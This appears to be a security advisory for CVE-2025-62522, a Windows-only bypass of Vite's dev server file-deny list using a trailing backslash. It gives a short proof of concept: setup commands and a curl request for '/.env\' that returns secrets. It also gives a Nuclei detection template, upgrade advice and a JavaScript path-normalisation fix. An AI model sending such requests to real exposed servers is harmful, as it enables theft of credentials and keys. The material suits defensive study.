This vulnerability, identified as CVE-2025-62522, is a security bypass in Vite's development server that affects only Windows systems. The issue resides in how Vite processes URLs that end with a backslash (`\`), which causes the `server.fs.deny` mechanism to fail.
When a URL ends with a backslash, the internal path validation logic does not normalize the path correctly. As a result, a request for a protected file such as `/.env\` is not matched by the deny check, while the underlying Windows file system interprets the backslash as a valid path separator and resolves the request to the real file.
The default `server.fs.deny` configuration includes sensitive file patterns such as `.env`, `.env.*`, and `*.{crt,pem}` to prevent direct access. However, because the path check is bypassed, an attacker can request `.env` using `/.env\` and retrieve the file's contents.
This vulnerability affects only applications that meet the following conditions:
1. The Vite dev server is explicitly exposed to the network (via `--host` or the `server.host` configuration).
2. The sensitive file resides in a directory allowed by `server.fs.allow`.
3. The dev server runs on Windows.
The root cause is that Node.js `fs.readFile('/foo.png/')` loads `/foo.png`, and Vite relies on the same behavior. By appending a backslash, the path matching for `server.fs.deny` fails, but the file system still serves the file.
The issue was fixed in Vite versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.
DailyCVE Form
Platform: Windows NTFS
Version: 2.9.18 – 7.1.10
Vulnerability: FS Deny Bypass
Severity: Medium (CVSS 6.0)
Date: 2025‑10‑20
Prediction: Patched already (Oct 2025)
What Undercode Say
The following commands and code snippets demonstrate the vulnerability and its detection.
PoC: Setup the Vulnerable Vite Server
$ npm create vite@latest vulnerable-app
$ cd vulnerable-app
$ echo "DB_PASSWORD=supersecret" > .env
$ npm install
$ npm run dev -- --host
Curl Request to Exploit CVE‑2025‑62522
$ curl --request-target '/.env\' http://localhost:5173
DB_PASSWORD=supersecret
Expected output: the contents of `.env` are returned in the response body, proving the bypass. (Single quotes are used so the shell passes the trailing backslash through literally; inside double quotes `\"` would escape the closing quote.)
Nuclei Template Detection (CVE‑2025‑62522)
id: CVE-2025-62522

info:
  name: Vite server.fs.deny Bypass via Backslash on Windows
  author: Undercode
  severity: medium

requests:
  - method: GET
    path:
      - '{{BaseURL}}/.env\'
    matchers:
      - type: word
        words:
          - "DB_PASSWORD"
          - "API_KEY"
Exploit
An attacker can exploit CVE‑2025‑62522 by sending a simple GET request to the exposed Vite development server, appending a backslash to the path of a protected file (e.g., /.env\). The server, failing to block the backslash‑terminated path, reads the file and returns its content. This allows the attacker to retrieve environment variables, TLS certificates, and other sensitive files that match the `server.fs.deny` patterns. The attack requires no authentication and can be performed from any network location that can reach the dev server.
Protection
- Upgrade to Vite versions 5.4.21, 6.4.1, 7.0.8, or 7.1.11 or later.
- Do not expose the Vite development server to the network in production environments. Use `--host` only in controlled development settings.
- Apply input validation on URLs to reject paths ending with a backslash before they reach the `fs.readFile` function.
- Restrict network access to the dev server using firewalls or localhost binding if an upgrade is not immediately possible.
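The validation step recommended above, as an added JavaScript example that is not Vite's own code: a naive deny check that compares the raw basename against the default patterns (and is defeated by a trailing backslash) next to a hardened check that percent-decodes, treats `\` as a separator and strips trailing separators before matching. The function names, the tiny glob converter and the sample request paths are this example's own constructions.

```javascript
// Added example, not Vite's own code: a minimal server.fs.deny-style check that
// shows why a trailing backslash defeats a naive basename comparison, and how
// normalising the request path before matching closes the gap.

// Deny patterns from the advisory, in the glob syntax Vite documents.
const DENY_PATTERNS = ['.env', '.env.*', '*.{crt,pem}'];

// Tiny glob-to-RegExp converter for the subset used above ('*' and '{a,b}').
function globToRegExp(glob) {
  const body = glob
    .replace(/[.+^$()|[\]?]/g, '\\$&')          // escape regex metacharacters
    .replace(/\*/g, '[^/]*')                    // '*' stays within one segment
    .replace(/\{([^}]+)\}/g, (_, alts) => `(?:${alts.split(',').join('|')})`);
  return new RegExp(`^${body}$`);
}
const DENY_REGEXPS = DENY_PATTERNS.map(globToRegExp);

// Naive check: strips trailing '/' only, so '/.env\' keeps its backslash and
// the basename '.env\' matches nothing, while Windows still opens '.env'.
function naiveDenied(urlPath) {
  const base = urlPath.replace(/\/+$/, '').split('/').pop();
  return DENY_REGEXPS.some((re) => re.test(base));
}

// Hardened check: percent-decode, treat '\' as a separator, drop trailing
// separators, then test every path segment (fail closed on undecodable input).
function normaliseRequestPath(urlPath) {
  let p;
  try { p = decodeURIComponent(urlPath); } catch { return null; } // bad %-escape
  return p.replace(/\\/g, '/')   // Windows separator -> '/'
          .replace(/\/+/g, '/')  // collapse runs of '/'
          .replace(/\/+$/, '');  // trailing separators are ignored by the FS
}

function hardenedDenied(urlPath) {
  const p = normaliseRequestPath(urlPath);
  if (p === null) return true;
  return p.split('/').some((seg) => DENY_REGEXPS.some((re) => re.test(seg)));
}

// Constructed sample requests: the backslash variant slips past the naive check.
for (const req of ['/.env', '/.env\\', '/%2Eenv%5C', '/certs/server.pem/', '/src/main.ts']) {
  console.log(req.padEnd(20), 'naive:', naiveDenied(req), 'hardened:', hardenedDenied(req));
}
```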
Impact
Successful exploitation of CVE‑2025‑62522 allows an unauthenticated remote attacker to read arbitrary files that are otherwise blocked by the `server.fs.deny` list. Common targets include `.env` files (containing API keys, database credentials, and other secrets) and certificate files (.crt, .pem). This can lead to complete compromise of the application’s sensitive data, enabling further attacks such as lateral movement, data exfiltration, and credential theft.
Sources:
Reported By: github.com